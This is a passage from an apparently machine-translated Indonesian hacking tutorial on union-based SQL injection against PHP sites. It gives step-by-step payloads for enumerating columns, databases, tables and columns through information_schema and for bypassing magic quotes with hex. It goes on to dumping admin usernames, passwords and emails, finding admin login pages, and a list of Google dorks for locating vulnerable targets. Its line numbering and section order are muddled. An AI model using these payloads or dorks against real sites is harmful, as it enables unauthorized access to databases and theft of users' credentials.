4244http://www.site.com/buy.php?id=-1 CaN I HaZ TeH PaSSwOrDs? PLz dan ThX
4245
4246TIDAK MASALAH (btw tolong jangan berpikir itu adalah perintah yang sebenarnya).
4247
4248Jadi kembali ke perintah ORDER BY. Untuk menemukan jumlah kolom, kami menulis kueri dengan nilai inkrementing hingga kami mendapatkan kesalahan, seperti ini:
4249
4250Kode:
4251http://www.site.com/buy.php?id=1 ORDER BY 1-- <--- Tidak ada kesalahan
4252http://www.site.com/buy.php?id=1 ORDER BY 2-- <--- Tidak ada kesalahan
4253http://www.site.com/buy.php?id=1 ORDER BY 3-- <--- Tidak ada kesalahan
4254http://www.site.com/buy.php?id=1 ORDER BY 4-- <--- Tidak ada kesalahan
4255http://www.site.com/buy.php?id=1 ORDER BY 5-- <--- ERROR!
4256
4257Ini berarti ada empat kolom!
4258
4259JANGAN LUPA UNTUK MENGUNGKAPKAN NULL DOUBLE (-) SETELAH QUERY.
4260SANGAT PENTING!
4261
4262Bagian Tiga - Menemukan kolom mana yang rentan
4263
4264Jadi kita tahu bahwa ada empat kolom sekarang kita harus mencari tahu mana yang rentan terhadap injeksi. Untuk melakukan ini, kami menggunakan UNION dan SELECT queries sambil mempertahankan double null (-) di akhir string. Ada juga perbedaan lain yang berukuran kecil tetapi tidak penting, lihat apakah Anda dapat menemukannya.
4265
4266Kode:
4267http://www.site.com/buy.php?id=-1 UNION SELECT 1,2,3,4--
4268
4269Jika Anda tidak dapat menemukan perbedaannya, ini adalah nol tambahan di antara tanda "=" dan nilai (nomor).
4270
4271buy.php? id = -1
4272
4273Sekarang setelah memasukkan pertanyaan itu Anda harus dapat melihat beberapa angka di suatu tempat di halaman yang tampaknya tidak pada tempatnya. Itu adalah jumlah kolom yang rentan terhadap injeksi. Kita dapat menggunakan kolom-kolom itu untuk menarik informasi dari database yang akan kita lihat di Bagian Dua.
4274
4275Bagian Dua - Mengumpulkan Informasi
4276
4277Pada bagian ini kita akan menemukan bagaimana menemukan nama database dan versi SQL apa yang digunakan situs web dengan menggunakan kueri untuk mengeksploitasi situs.
4278
4279Bagian Satu - Menentukan versi SQL.
4280
4281Menemukan versi SQL dari situs web adalah langkah yang sangat penting karena langkah yang Anda ambil untuk versi 4 cukup berbeda dari versi 5 untuk mendapatkan apa yang Anda inginkan. Dalam tutorial ini, saya tidak akan membahas versi 4 karena ini adalah permainan menebak dan untuk jenis situs yang masih menggunakannya, itu tidak sebanding dengan waktu Anda.
4282
4283Jika kita melihat kembali ke akhir Bagian Tiga di Bagian Satu kita melihat bagaimana menemukan kolom yang rentan. Menggunakan informasi itu kita dapat mengumpulkan pertanyaan berikutnya (saya akan menggunakan kolom 2). Perintah akan terlihat seperti ini:
4284
4285Kode:
4286http://www.site.com/buy.php?id=-1 UNION SELECT 1, @@ version, 3,4--
4287
4288Karena 2 adalah kolom rentan, di sinilah kita akan menempatkan "@@ version". String lain yang dapat menggantikan "@@ version" adalah "versi ()".
4289
4290Jika situs web masih tidak menampilkan versi coba menggunakan unhex (hex ()) yang terlihat seperti ini:
4291
4292Kode:
4293http://www.site.com/buy.php?id=-1 UNION SELECT 1, unhex (hex (@@ version)), 3,4--
4294
4295CATATAN: Jika metode ini harus digunakan di sini, itu harus digunakan untuk sisa suntikan juga.
4296
4297Sekarang apa yang ingin Anda lihat adalah sesuatu di bawah garis-garis ini:
4298
4299Kode:
43005.1.47-komunitas-log
4301
4302Yang merupakan versi dari SQL untuk situs web.
4303
4304CATATAN: Jika Anda melihat versi 4 dan Anda ingin mencobanya, ada tutorial lain yang menjelaskan cara menyuntikkannya.
4305
4306Bagian Dua - Menemukan basis data
4307
4308Menemukan nama basis data tidak selalu merupakan langkah yang diperlukan untuk mengumpulkan informasi yang Anda inginkan, namun dalam pengalaman saya mengikuti langkah-langkah ini dan menemukan basis data terkadang dapat menghasilkan tingkat keberhasilan yang lebih tinggi.
4309
4310Untuk menemukan database kami menggunakan query seperti yang di bawah ini:
4311
4312Kode:
4313http://www.site.com/buy.php?id=-1 UNION SELECT 1, group_concat (schema_name), 3,4 dari information_schema.schemata--
4314
4315Ini terkadang menghasilkan lebih banyak hasil daripada yang diperlukan dan saat itulah kami beralih ke kueri ini:
4316
4317Kode:
4318http://www.site.com/buy.php?id=-1 UNION SELECT 1, concat (database ()), 3,4--
4319
4320Selamat! Anda sekarang memiliki nama database! Salin dan tempelkan nama di suatu tempat yang aman, kita akan membutuhkannya nanti.
4321
4322Bagian Tiga - The Good Stuff
4323
4324Ini adalah bagian yang menyenangkan di mana kami akan menemukan nama pengguna, email, dan kata sandi!
4325
4326Bagian Satu - Menemukan nama-nama tabel
4327
4328Untuk menemukan nama tabel kami menggunakan query yang mirip dengan yang digunakan untuk mencari database dengan sedikit tambahan tambahan:
4329
4330Kode:
4331http://www.site.com/buy.php?id=-1 UNION SELECT 1, group_concat (table_name), 3,4 FROM information_schema.tables WHERE table_schema = database () -
4332
4333Mungkin terlihat panjang dan membingungkan tetapi setelah Anda memahaminya, itu tidak benar-benar saya akan coba jelaskan. Apa yang dilakukan oleh query ini adalah "groups" (group_concat) "nama tabel" (nama_tabel) bersama-sama dan mengumpulkan informasi tersebut "dari" (FROM) information_schema.tables di mana "skema tabel" (table_schema) dapat ditemukan di "basis data "(database ()).
4334
4335CATATAN: Saat menggunakan group_concat Anda hanya akan dapat melihat tabel 1024 karakter, jadi jika Anda melihat bahwa tabel terputus pada saklar akhir untuk membatasi yang akan saya jelaskan sekarang.
4336
4337Kode:
4338http://www.site.com/buy.php?id=-1 UNION SELECT 1, table_name, 3,4 FROM information_schema.tables WHERE table_schema = database () LIMIT 0,1--
4339
4340Apa yang dilakukan adalah menampilkan tabel pertama dan satu-satunya yang pertama. Jadi jika kita kehabisan karakter, katakanlah tabel ke-31 kita bisa menggunakan query ini:
4341
4342Kode:
4343http://www.site.com/buy.php?id=-1 UNION SELECT 1, table_name, 3,4 FROM information_schema.tables WHERE table_schema = database () LIMIT 30,1--
4344
4345Perhatikan bagaimana batas saya adalah 30,1 bukannya 31,1? Ini karena ketika menggunakan batas dimulai dari 0,1 yang berarti bahwa ke-30 sebenarnya adalah Tongue ke-31
4346
4347Anda sekarang memiliki semua nama tabel!
4348
4349
4350Bagian Dua - Menemukan nama-nama kolom
4351
4352Sekarang setelah Anda memiliki semua nama tabel coba dan pilih salah satu yang menurut Anda akan berisi informasi berair. Biasanya mereka adalah tabel seperti User (s), Admin (s), tblUser (s) dan sebagainya tetapi itu bervariasi antar situs.
4353
4354Setelah menentukan tabel mana yang menurut Anda berisi informasi, gunakan kueri ini (dalam contoh saya, saya akan menggunakan nama tabel "Admin"):
4355
4356Kode:
4357http://www.site.com/buy.php?id=-1 UNION SELECT 1, group_concat (column_name), 3,4 FROM information_schema.columns WHERE table_name = "Admin" -
4358
4359Ini akan memberi Anda daftar semua kolom di dalam tabel atau memberi Anda kesalahan tetapi jangan panik jika hasilnya # 2! Semua ini berarti bahwa Kutipan Sihir diaktifkan. Ini dapat dilewati dengan menggunakan hex atau char converter (keduanya berfungsi) untuk mengonversi teks normal menjadi char atau hex (tautan ke situs web yang melakukan ini akan dimasukkan di akhir tutorial).
4360
4361PEMBARUAN: Jika Anda mendapatkan kesalahan pada titik ini, yang harus Anda lakukan adalah ikuti langkah-langkah berikut:
4362
43631. Salin nama tabel yang Anda coba akses.
43642. Tempelkan nama tabel ke dalam situs web ini yang bertuliskan "Say Hello To My Little Friend".
4365Konverter Hex / Char
4366http://www.swingnote.com/tools/texttohex.php
43673. Klik konversikan.
43684. Salin string angka / huruf di bawah Hex ke dalam kueri Anda sehingga terlihat seperti ini:
4369
4370Kode:
4371http://www.site.com/buy.php?id=-1 UNION SELECT 1, group_concat (column_name), 3,4 FROM information_schema.columns WHERE table_name = 0x41646d696e--
4372
4373Perhatikan bagaimana sebelum saya menempelkan hex saya menambahkan "0x", semua ini memberitahu server bahwa karakter berikut adalah bagian dari string hex.
4374
4375Anda sekarang harus melihat daftar semua kolom dalam tabel seperti nama pengguna, kata sandi, dan email.
4376
4377CATATAN: Menggunakan fungsi batas berfungsi dengan kolom juga.
4378
4379Bagian Tiga - Menampilkan isi kolom
4380
4381Kami hampir selesai! Yang harus kita lakukan adalah melihat apa yang ada di dalam kolom itu dan menggunakan informasi untuk masuk! Untuk melihat kolom yang kita butuhkan untuk memutuskan mana yang ingin kita lihat dan kemudian menggunakan query ini (dalam contoh ini saya ingin melihat kolom "username", "password", dan "email", dan nama database saya akan "db123 "). Di sinilah nama database berguna:
4382
4383Kode:
4384http://www.site.com/buy.php?id=-1 UNION SELECT 1, group_concat (nama pengguna, 0x3a, kata sandi, 0x3a, email), 3,4 DARI db123.Admin--
4385
4386Dalam query ini, 0x3a adalah nilai hex dari titik dua (:) yang akan mengelompokkan username: password: email untuk masing-masing pengguna begitu saja.
4387
4388AKHIRNYA! Sekarang Anda memiliki informasi login untuk pengguna situs, termasuk admin. Yang harus Anda lakukan sekarang adalah menemukan halaman login admin yang membawa kita ke Bagian Empat.
4389
4390Bagian Empat - Mencari halaman admin
4391
4392Biasanya halaman admin akan langsung dari halaman beranda situs, berikut beberapa contohnya:
4393
4394Kode:
4395http://www.site.com/admin
4396http://www.site.com/adminlogin
4397http://www.site.com/modlogin
4398http://www.site.com/moderator
4399
4400Sekali lagi ada program yang akan menemukan halaman untuk Anda tetapi pertama-tama cobalah beberapa tebakan dasar, itu mungkin menghemat beberapa klik. Jika Anda menggunakan program Reiluke telah mengkodekan satu untuk itu juga. Cari Admin Finder oleh Reiluke.
4401
4402Dan itu termasuk tutorial saya! Saya harap ini bermanfaat bagi sebagian dari Anda. Ingatlah untuk terus berlatih dan akhirnya Anda akan memiliki semua pertanyaan yang dihafalkan dalam waktu singkat!
4403
4404Komentar dan Nilai!
4405
4406Berikan kredit di mana kredit jatuh tempo!
4407
4408Saya menepati janji saya jadi di sini adalah apa yang saya katakan akan saya sertakan:
4409
4410Daftar Dork
4411trainers.php? id =
4412article.php? ID =
4413play_old.php? id =
4414declaration_more.php? decl_id =
4415Pageid =
4416games.php? id =
4417newsDetail.php? id =
4418staff_id =
4419historialeer.php? num =
4420product-item.php? id =
4421news_view.php? id =
4422humor.php? id =
4423communique_detail.php? id =
4424sem.php3? id =
4425opinions.php? id =
4426spr.php? id =
4427pages.php? id =
4428chappies.php? id =
4429prod_detail.php? id =
4430viewphoto.php? id =
4431view.php? id =
4432website.php? id =
4433hosting_info.php? id =
4434gery.php? id =
4435detail.php? ID =
4436publikasi.php? id =
4437Productinfo.php? Id =
4438releases.php? id =
4439ray.php? id =
4440produit.php? id =
4441pop.php? id =
4442shopping.php? id =
4443productdetail.php? id =
4444post.php? id =
4445section.php? id =
4446theme.php? id =
4447page.php? id =
4448shredder-categories.php? id =
4449product_ranges_view.php? ID =
4450shop_category.php? id =
4451channel_id =
4452newsid =
4453news_display.php? getid =
4454ages.php? id =
4455clanek.php4? id =
4456review.php? id =
4457iniziativa.php? in =
4458kurikulum.php? id =
4459labels.php? id =
4460lihat.php? ID =
4461galeri_info.php? l =
4462tekst.php? idt =
4463newscat.php? id =
4464newsticker_info.php? idn =
4465rubrika.php? idr =
4466offer.php? idf =
4467
4468Ada daftar dork yang lebih luas yang dapat ditemukan.
4469
4470Konverter Hex / Char
4471http://www.swingnote.com/tools/texttohex.php